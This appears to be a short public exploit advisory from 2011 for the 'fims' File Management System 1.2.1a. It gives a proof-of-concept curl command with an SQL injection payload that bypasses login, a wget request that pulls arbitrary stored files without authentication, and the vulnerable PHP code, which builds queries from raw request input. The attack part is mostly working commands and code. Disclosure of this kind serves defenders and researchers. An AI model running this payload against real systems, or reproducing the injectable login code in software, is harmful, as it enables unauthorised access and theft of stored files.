38 lines
No EOL
1.4 KiB
Text
38 lines
No EOL
1.4 KiB
Text
# Exploit Title: fims - File Management System <= 1.2.1a SQL Injection and Vulnerability
|
|
# Date: 2011-10-19
|
|
# Author: Skraps (jackie.craig.sparks(at)live.com jackie.craig.sparks(at)gmail.com @skraps_foo)
|
|
# Software Link: http://fims.codeplex.com/
|
|
# Version: 1.2.1a (tested)
|
|
|
|
|
|
---------------
|
|
PoC (POST or GET data)
|
|
---------------
|
|
curl --data "l=help@juno.com&password=word') or id=ABS('1" http://127.0.0.1/fims/?p=1
|
|
|
|
wget "http://127.0.0.1/fims/index.php?f={anyfile number}"
|
|
|
|
---------------
|
|
Vulnerable code
|
|
---------------
|
|
Line 18 of index.php:
|
|
if (login($g_db, $_REQUEST[email], $_REQUEST[password]))
|
|
Line 117 of functions.php:
|
|
function login($db, $email, $password)
|
|
{
|
|
$rs = $db->execute("select * from fims_user where email='$email' and password=md5('$password')");
|
|
if ($db->numrows($rs)>0) return true;
|
|
else return false;
|
|
}
|
|
|
|
Line 51 of index.php:
|
|
if (isset($_REQUEST[f]))
|
|
{
|
|
assert(is_numeric($_REQUEST[f]));
|
|
$file = get_file_data($g_db, $_REQUEST[f]);
|
|
header("Accept-Ranges: bytes");
|
|
header("Content-Length: ".filesize("files/".$file[id]));
|
|
header("Content-Type: {$file[mime]}");
|
|
header("Content-Disposition: inline; filename=\"{$file['label']}\";");
|
|
readfile("files/".$file[id]);
|
|
} |